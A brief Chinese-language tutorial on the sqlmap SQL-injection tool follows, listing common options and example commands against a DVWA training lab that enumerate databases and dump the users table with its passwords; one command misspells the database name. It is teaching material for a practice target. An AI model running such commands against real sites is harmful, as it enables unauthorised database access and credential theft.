一、 官方對與工具的解釋
sqlmap是一款開源滲透測試工具,可自動檢測和利用SQL注入漏洞並接管數據庫服務器。它具有強大的檢測引擎,針對終極滲透測試人員的衆多特性,以及從數據庫指紋識別,從數據庫獲取數據,到訪問底層文件系統以及在操作系統上執行命令的各種開關,帶外連接。
二、一些常用的選項
- –dump 轉儲DBMS數據庫表條目
- –dump-all 轉儲所有DBMS數據庫表條目
- –tables 枚舉DBMS數據庫表
- –columns 枚舉DBMS數據庫表列
- –u 指定目標的URL
- –cookie=COOKIE HTTP Cookie標頭值
- –level=LEVEL 要執行的測試級別(1-5,默認值1)
- –risk=RISK 要執行測試的風險(1-3,默認值1)
- –dbms=DBMS 強制指定數據庫類
三、 簡單的測試實例
- 檢測注入點
sqlmap -u "http://192.168.10.1/dvwa/vulnerabilities/sqli/?id=1"
- 列出數據庫
sqlmap -u "http://192.168.10.1/dvwa/vulnerabilities/sqli/?id=1" --dbs
- 列出指定數據庫中的表
sqlmap -u "http://192.168.10.1/dvwa/vulnerabilities/sqli/?id=1" -D dvwa --tables
- 列出指定表中的列
sqlmap -u "http://192.168.10.1/dvwa/vulnerabilities/sqli/?id=1" -D dwwa -T users --columns
- dump出指定列中的數據字段,及帳號密碼
sqlmap -u "http://192.168.10.1/dvwa/vulnerabilities/sqli/?id=1" -D dvwa -T users --columns --dump